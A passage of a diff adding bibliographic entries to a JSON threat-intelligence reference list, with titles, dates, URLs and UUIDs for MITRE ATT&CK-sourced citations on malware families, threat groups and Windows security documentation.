"https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Security" + }, + "related": [], + "uuid": "e087442a-0a53-4cc8-9fd6-772cbd0295d5", + "value": "Microsoft Dynamic-Link Library Security" + }, + { + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Security" + }, + "related": [], + "uuid": "584490c7-b155-4f62-b68d-a5a2a1799e60", + "value": "Microsoft DLL Security" + }, + { + "description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.", + "meta": { + "date_accessed": "2018-08-23T00:00:00Z", + "date_published": "2015-06-23T00:00:00Z", + "refs": [ + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf" + ], + "source": "MITRE", + "title": "Dyre: Emerging threat on financial fraud landscape" + }, + "related": [], + "uuid": "a9780bb0-302f-44c2-8252-b53d94da24e6", + "value": "Symantec Dyre June 2015" + }, + { + "description": "Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022.", + "meta": { + "date_accessed": "2022-05-31T00:00:00Z", + "date_published": "2021-06-11T00:00:00Z", + "refs": [ + "https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant" + ], + "source": "MITRE", + "title": "EA hack reportedly used stolen cookies and Slack to target gaming giant" + }, + "related": [], + "uuid": "3362e1df-cfb9-4281-a0a1-9a3710d76945", + "value": "EA Hacked via Slack - June 2021" + }, + { + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "meta": { + "date_accessed": "2022-02-07T00:00:00Z", + "date_published": "2022-01-27T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + ], + "source": "MITRE", + "title": "Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign" + }, + "related": [], + "uuid": "149c1446-d6a1-4a63-9420-def9272d6cb9", + "value": "CrowdStrike StellarParticle January 2022" + }, + { + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "meta": { + "date_accessed": "2021-03-18T00:00:00Z", + "date_published": "2021-03-05T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + ], + "source": "MITRE", + "title": "Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East" + }, + "related": [], + "uuid": "16b4b834-2f44-4bac-b810-f92080c41f09", + "value": "Trend Micro Muddy Water March 2021" + }, + { + "description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.", + "meta": { + "date_accessed": "2021-08-27T00:00:00Z", + "refs": [ + "https://www.sec.gov/edgar/search-and-access" + ], + "source": "MITRE", + "title": "EDGAR - Search and Access" + }, + "related": [], + "uuid": "97958143-80c5-41f6-9fa6-4748e90e9f12", + "value": "SEC EDGAR Search" + }, + { + "description": "Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2020-11-12T00:00:00Z", + "refs": [ + "https://www.intrinsec.com/egregor-prolock/?cn-reloaded=1" + ], + "source": "MITRE", + "title": "Egregor – Prolock: Fraternal Twins ?" + }, + "related": [], + "uuid": "e55604da-b419-411a-85cf-073f2d78e0c1", + "value": "Intrinsec Egregor Nov 2020" + }, + { + "description": "Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.", + "meta": { + "date_accessed": "2020-12-30T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware" + ], + "source": "MITRE", + "title": "Egregor Ransomware" + }, + "related": [], + "uuid": "c36b38d4-cfa2-4f1e-a410-6d629a24be62", + "value": "Cybereason Egregor Nov 2020" + }, + { + "description": "Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.", + "meta": { + "date_accessed": "2020-12-29T00:00:00Z", + "date_published": "2020-10-31T00:00:00Z", + "refs": [ + "https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/" + ], + "source": "MITRE", + "title": "Egregor Ransomware – A Deep Dive Into Its Activities and Techniques" + }, + "related": [], + "uuid": "545a131d-88fc-4b34-923c-0b759b45fc7f", + "value": "Cyble Egregor Oct 2020" + }, + { + "description": "NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.", + "meta": { + "date_accessed": "2020-12-29T00:00:00Z", + "date_published": "2020-11-26T00:00:00Z", + "refs": [ + "https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary" + ], + "source": "MITRE", + "title": "Egregor Ransomware The RaaS successor to Maze" + }, + "related": [], + "uuid": "92f74037-2a20-4667-820d-2ccc0e4dbd3d", + "value": "NHS Digital Egregor Nov 2020" + }, + { + "description": "Meskauskas, T.. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2020-10-29T00:00:00Z", + "refs": [ + "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/" + ], + "source": "MITRE", + "title": "Egregor: Sekhmet’s Cousin" + }, + "related": [], + "uuid": "cd37a000-9e15-45a3-a7c9-bb508c10e55d", + "value": "Security Boulevard Egregor Oct 2020" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2020, June 30). EINSTEIN Data Trends – 30-day Lookback. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "date_published": "2020-06-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-182a" + ], + "source": "Tidal Cyber", + "title": "EINSTEIN Data Trends – 30-day Lookback" + }, + "related": [], + "uuid": "b97e9a02-4cc5-4845-8058-0be4c566cd7c", + "value": "U.S. CISA Trends June 30 2020" + }, + { + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.", + "meta": { + "date_accessed": "2021-02-09T00:00:00Z", + "date_published": "2020-02-03T00:00:00Z", + "refs": [ + "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + ], + "source": "MITRE", + "title": "EKANS Ransomware and ICS Operations" + }, + "related": [], + "uuid": "c8a018c5-caa3-4af1-b210-b65bbf94c8b2", + "value": "Dragos EKANS" + }, + { + "description": "Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019.", + "meta": { + "date_accessed": "2019-03-26T00:00:00Z", + "date_published": "2007-03-14T00:00:00Z", + "refs": [ + "https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp" + ], + "source": "MITRE", + "title": "EldoS Provides Raw Disk Access for Vista and XP" + }, + "related": [], + "uuid": "a6cf3d1d-2310-42bb-9324-495b4e94d329", + "value": "EldoS RawDisk ITpro" + }, + { + "description": "Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "refs": [ + "https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/" + ], + "source": "MITRE, Tidal Cyber", + "title": "elections" + }, + "related": [], + "uuid": "1d7070fd-01be-4776-bb21-13368a6173b1", + "value": "Microsoft Targeting Elections September 2020" + }, + { + "description": "Secureworks CTU. (2021, May 28). USAID-Themed Phishing Campaign Leverages U.S. Elections Lure. Retrieved February 24, 2022.", + "meta": { + "date_accessed": "2022-02-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure" + ], + "source": "MITRE", + "title": "Elections Lure" + }, + "related": [], + "uuid": "0d42c329-5847-4970-9580-2318a566df4e", + "value": "Secureworks IRON RITUAL USAID Phish May 2021" + }, + { + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://www.dragos.com/resource/electrum/" + ], + "source": "MITRE", + "title": "ELECTRUM Threat Profile" + }, + "related": [], + "uuid": "494f7056-7a39-4fa0-958d-fb1172d01852", + "value": "Dragos ELECTRUM" + }, + { + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "meta": { + "date_accessed": "2019-04-10T00:00:00Z", + "date_published": "2019-03-27T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + ], + "source": "MITRE", + "title": "Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S." + }, + "related": [], + "uuid": "55671ede-f309-4924-a1b4-3d597517b27e", + "value": "Symantec Elfin Mar 2019" + }, + { + "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2016-04-22T00:00:00Z", + "refs": [ + "https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/" + ], + "source": "MITRE", + "title": "ELF SHARED LIBRARY INJECTION FORENSICS" + }, + "related": [], + "uuid": "1c8fa804-6579-4e68-a0b3-d16e0bee5654", + "value": "Backtrace VDSO" + }, + { + "description": "Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.", + "meta": { + "date_accessed": "2019-09-13T00:00:00Z", + "date_published": "2014-08-20T00:00:00Z", + "refs": [ + "https://securelist.com/el-machete/66108/" + ], + "source": "MITRE, Tidal Cyber", + "title": "El Machete" + }, + "related": [], + "uuid": "fc7be240-bd15-4ec4-bc01-f8891d7210d9", + "value": "Securelist Machete Aug 2014" + }, + { + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "meta": { + "date_accessed": "2019-09-13T00:00:00Z", + "date_published": "2017-03-22T00:00:00Z", + "refs": [ + "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "El Machete's Malware Attacks Cut Through LATAM" + }, + "related": [], + "uuid": "92a9a311-1e0b-4819-9856-2dfc8dbfc08d", + "value": "Cylance Machete Mar 2017" + }, + { + "description": "Microsoft. (2022, February 15). Email exfiltration controls for connectors. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2022-02-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/power-platform/admin/block-forwarded-email-from-power-automate" + ], + "source": "MITRE", + "title": "Email exfiltration controls for connectors" + }, + "related": [], + "uuid": "79eeaadf-5c1e-4608-84a5-6c903966a7f3", + "value": "Power Automate Email Exfiltration Controls" + }, + { + "description": "Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://www.hackers-arise.com/email-scraping-and-maltego" + ], + "source": "MITRE", + "title": "Email Scraping and Maltego" + }, + "related": [], + "uuid": "b6aefd99-fd97-4ca0-b717-f9dc147c9413", + "value": "HackersArise Email" + }, + { + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "meta": { + "date_accessed": "2020-11-30T00:00:00Z", + "date_published": "2020-01-13T00:00:00Z", + "refs": [ + "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + ], + "source": "MITRE", + "title": "Embracing offensive tooling: Building detections against Koadic using EQL" + }, + "related": [], + "uuid": "689b71f4-f8e5-455f-91c2-c599c8650f11", + "value": "Elastic - Koadiac Detection with EQL" + }, + { + "description": "Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.", + "meta": { + "date_accessed": "2018-06-25T00:00:00Z", + "date_published": "2018-05-18T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/" + ], + "source": "MITRE", + "title": "Emissary Panda – A potential new malicious tool" + }, + "related": [], + "uuid": "e279c308-fabc-47d3-bdeb-296266c80988", + "value": "Nccgroup Emissary Panda May 2018" + }, + { + "description": "Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.", + "meta": { + "date_accessed": "2019-07-09T00:00:00Z", + "date_published": "2019-05-28T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + ], + "source": "MITRE", + "title": "Emissary Panda Attacks Middle East Government Sharepoint Servers" + }, + "related": [], + "uuid": "3a3ec86c-88da-40ab-8e5f-a7d5102c026b", + "value": "Unit42 Emissary Panda May 2019" + }, + { + "description": "Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.", + "meta": { + "date_accessed": "2016-02-15T00:00:00Z", + "date_published": "2016-02-03T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" + ], + "source": "MITRE", + "title": "Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?" + }, + "related": [], + "uuid": "580ce22f-b76b-4a92-9fab-26ce8f449ab6", + "value": "Emissary Trojan Feb 2016" + }, + { + "description": "Brandt, A.. (2019, May 5). Emotet 101, stage 4: command and control. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2019-05-05T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2019/03/05/emotet-101-stage-4-command-and-control/" + ], + "source": "MITRE", + "title": "Emotet 101, stage 4: command and control" + }, + "related": [], + "uuid": "0bd01e6c-6fb5-4bae-9fe9-395de061c1da", + "value": "Sophos Emotet Apr 2019" + }, + { + "description": "CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.", + "meta": { + "date_accessed": "2019-01-17T00:00:00Z", + "date_published": "2017-04-28T00:00:00Z", + "refs": [ + "https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/" + ], + "source": "MITRE", + "title": "Emotet Changes TTPs and Arrives in United States" + }, + "related": [], + "uuid": "8dc7653f-84ef-4f0a-91f6-9b10ff50b756", + "value": "CIS Emotet Apr 2017" + }, + { + "description": "Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "refs": [ + "https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/" + ], + "source": "MITRE", + "title": "Emotet Evolves With new Wi-Fi Spreader" + }, + "related": [], + "uuid": "05e624ee-c53d-5cd1-8fd2-6b2d38344bfd", + "value": "Binary Defense Emotes Wi-Fi Spreader" + }, + { + "description": "ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2018-11-09T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/" + ], + "source": "MITRE", + "title": "Emotet launches major new spam campaign" + }, + "related": [], + "uuid": "e954c9aa-4995-452c-927e-11d0a6e2f442", + "value": "ESET Emotet Nov 2018" + }, + { + "description": "Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.", + "meta": { + "date_accessed": "2022-02-16T00:00:00Z", + "date_published": "2020-02-13T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi" + ], + "source": "MITRE", + "title": "Emotet Now Spreads via Wi-Fi" + }, + "related": [], + "uuid": "150327e6-db4b-4588-8cf2-ee131569150b", + "value": "Trend Micro Emotet 2020" + }, + { + "description": "Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2019-01-15T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2019/01/return-of-emotet.html" + ], + "source": "MITRE", + "title": "Emotet re-emerges after the holidays" + }, + "related": [], + "uuid": "83180391-89b6-4431-87f4-2703b47cb81b", + "value": "Talos Emotet Jan 2019" + }, + { + "description": "The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.", + "meta": { + "date_accessed": "2023-03-06T00:00:00Z", + "date_published": "2022-11-08T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/" + ], + "source": "MITRE", + "title": "Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware" + }, + "related": [], + "uuid": "02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0", + "value": "Emotet shutdown" + }, + { + "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.", + "meta": { + "date_accessed": "2019-05-24T00:00:00Z", + "date_published": "2019-04-24T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/" + ], + "source": "MITRE", + "title": "Emotet Using WMI to Launch PowerShell Encoded Code" + }, + "related": [], + "uuid": "db8fe753-d674-4668-9ee5-c1269085a7a1", + "value": "Carbon Black Emotet Apr 2019" + }, + { + "description": "Manea, D.. (2019, May 25). Emotet v4 Analysis. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2019-05-25T00:00:00Z", + "refs": [ + "https://danielmanea.com/category/reverseengineering/" + ], + "source": "MITRE", + "title": "Emotet v4 Analysis" + }, + "related": [], + "uuid": "578e44f2-9ff5-4bed-8dee-a992711df8ce", + "value": "DanielManea Emotet May 2017" + }, + { + "description": "Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.", + "meta": { + "date_accessed": "2022-04-14T00:00:00Z", + "date_published": "2018-03-08T00:00:00Z", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py" + ], + "source": "MITRE", + "title": "Empire keychaindump_decrypt Module" + }, + "related": [], + "uuid": "41075230-73a2-4195-b716-379f9e5ae93b", + "value": "Empire Keychain Decrypt" + }, + { + "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2018-04-08T00:00:00Z", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py" + ], + "source": "MITRE", + "title": "EmpireProject Create Dylib Hijacker" + }, + "related": [], + "uuid": "2908418d-54cf-4245-92c6-63f616b04e91", + "value": "Github EmpireProject CreateHijacker Dylib" + }, + { + "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2017-09-21T00:00:00Z", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py" + ], + "source": "MITRE", + "title": "Empire Project Dylib Hijack Vulnerability Scanner" + }, + "related": [], + "uuid": "c83e8833-9648-4178-b5be-6fa0af8f737f", + "value": "Github EmpireProject HijackScanner" + }, + { + "description": "Brower, N. & D'Souza-Wiltshire, I. (2017, November 9). Enable Attack surface reduction. Retrieved February 3, 2018.", + "meta": { + "date_accessed": "2018-02-03T00:00:00Z", + "date_published": "2017-11-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction" + ], + "source": "MITRE", + "title": "Enable Attack surface reduction" + }, + "related": [], + "uuid": "1cb445f6-a366-4ae6-a698-53da6c61b4c9", + "value": "Microsoft ASR Nov 2017" + }, + { + "description": "Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "date_published": "2021-02-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option" + ], + "source": "MITRE", + "title": "Enable Loading of Test Signed Drivers" + }, + "related": [], + "uuid": "c04153f9-d4c7-4349-9bef-3f883eec0028", + "value": "Microsoft TESTSIGNING Feb 2021" + }, + { + "description": "Microsoft. (n.d.). Enable or Disable DCOM. Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc771387.aspx" + ], + "source": "MITRE", + "title": "Enable or Disable DCOM" + }, + "related": [], + "uuid": "1aeac4da-f5fd-4fa3-9cc0-b1a50427c121", + "value": "Microsoft Disable DCOM" + }, + { + "description": "Microsoft. (n.d.). Enable or disable macros in Office files. Retrieved September 13, 2018.", + "meta": { + "date_accessed": "2018-09-13T00:00:00Z", + "refs": [ + "https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6" + ], + "source": "MITRE", + "title": "Enable or disable macros in Office files" + }, + "related": [], + "uuid": "cfe592a1-c06d-4555-a30f-c5d533dfd73e", + "value": "Microsoft Disable Macros" + }, + { + "description": "Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.", + "meta": { + "date_accessed": "2015-05-01T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc754820.aspx" + ], + "source": "MITRE", + "title": "Enable the Remote Registry Service" + }, + "related": [], + "uuid": "331d59e3-ce7f-483c-b77d-001c8a9ae1df", + "value": "Microsoft Remote" + }, + { + "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.", + "meta": { + "date_accessed": "2021-08-04T00:00:00Z", + "refs": [ + "https://www.pcmag.com/encyclopedia/term/double-extension" + ], + "source": "MITRE", + "title": "Encyclopedia: double extension" + }, + "related": [], + "uuid": "a729519d-8c9f-477c-b992-434076a9d294", + "value": "PCMag DoubleExtension" + }, + { + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ], + "source": "MITRE", + "title": "Engineering and Maritime Industries" + }, + "related": [], + "uuid": "8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f", + "value": "FireEye Periscope March 2018" + }, + { + "description": "NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.", + "meta": { + "date_accessed": "2021-04-12T00:00:00Z", + "date_published": "2017-02-10T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf" + ], + "source": "MITRE", + "title": "Enhanced Analysis of GRIZZLY STEPPE Activity" + }, + "related": [], + "uuid": "b930e838-649b-42ab-86dc-0443667276de", + "value": "NCCIC AR-17-20045 February 2017" + }, + { + "description": "ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.", + "meta": { + "date_accessed": "2016-11-08T00:00:00Z", + "date_published": "2016-10-01T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" + ], + "source": "MITRE", + "title": "En Route with Sednit - Part 1: Approaching the Target" + }, + "related": [], + "uuid": "a2016103-ead7-46b3-bae5-aa97c45a12b7", + "value": "ESET Sednit Part 1" + }, + { + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "meta": { + "date_accessed": "2016-11-21T00:00:00Z", + "date_published": "2016-10-01T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + ], + "source": "MITRE", + "title": "En Route with Sednit - Part 2: Observing the Comings and Goings" + }, + "related": [], + "uuid": "aefb9eda-df5a-437f-af2a-ec1b6c04628b", + "value": "ESET Sednit Part 2" + }, + { + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "meta": { + "date_accessed": "2016-11-21T00:00:00Z", + "date_published": "2016-10-01T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + ], + "source": "MITRE", + "title": "En Route with Sednit - Part 3: A Mysterious Downloader" + }, + "related": [], + "uuid": "7c2be444-a947-49bc-b5f6-8f6bec870c6a", + "value": "ESET Sednit Part 3" + }, + { + "description": "Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2011-06-01T00:00:00Z", + "refs": [ + "https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html" + ], + "source": "MITRE", + "title": "Ensuring your information is safe online" + }, + "related": [], + "uuid": "ad3eda19-08eb-4d59-a2c9-3b5ed8302205", + "value": "Google Ensuring Your Information is Safe" + }, + { + "description": "Fortinet Blog. (2018, November 13). Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2018-11-13T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign" + ], + "source": "Tidal Cyber", + "title": "Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign" + }, + "related": [], + "uuid": "1b9b5c48-d504-4c73-aedc-37e935c47f17", + "value": "Fortinet Blog November 13 2018" + }, + { + "description": "Splunk Threat Research Team. (2024, January 17). Enter The Gates: An Analysis of the DarkGate AutoIt Loader. Retrieved January 24, 2024.", + "meta": { + "date_accessed": "2024-01-24T00:00:00Z", + "date_published": "2024-01-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html" + ], + "source": "Tidal Cyber", + "title": "Enter The Gates: An Analysis of the DarkGate AutoIt Loader" + }, + "related": [], + "uuid": "a45a920c-3bda-4442-8650-4ad78f950283", + "value": "Splunk DarkGate January 17 2024" + }, + { + "description": "Microsoft. (2021, October 12). EnumDeviceDrivers function (psapi.h). Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "date_published": "2021-10-12T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers" + ], + "source": "MITRE", + "title": "EnumDeviceDrivers function (psapi.h)" + }, + "related": [], + "uuid": "647ffc70-8eab-5f2f-abf4-9bbf42554043", + "value": "Microsoft EnumDeviceDrivers" + }, + { + "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.", + "meta": { + "date_accessed": "2019-01-18T00:00:00Z", + "date_published": "1998-06-18T00:00:00Z", + "refs": [ + "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf" + ], + "source": "MITRE", + "title": "Environmental Key Generation towards Clueless Agents" + }, + "related": [], + "uuid": "ef7409d2-af39-4ad8-8469-76f0165687bd", + "value": "EK Clueless Agents" + }, + { + "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", + "meta": { + "date_accessed": "2021-05-18T00:00:00Z", + "refs": [ + "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc" + ], + "source": "MITRE", + "title": "Environment Awareness" + }, + "related": [], + "uuid": "af842a1f-8f39-4b4f-b4d2-0bbb810e6c31", + "value": "Deloitte Environment Awareness" + }, + { + "description": "Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016.", + "meta": { + "date_accessed": "2016-07-27T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx" + ], + "source": "MITRE", + "title": "Environment Property" + }, + "related": [], + "uuid": "79ea888c-2dd7-40cb-9149-e2469a35ea3a", + "value": "MSDN Environment Property" + }, + { + "description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.", + "meta": { + "date_accessed": "2016-07-27T00:00:00Z", + "date_published": 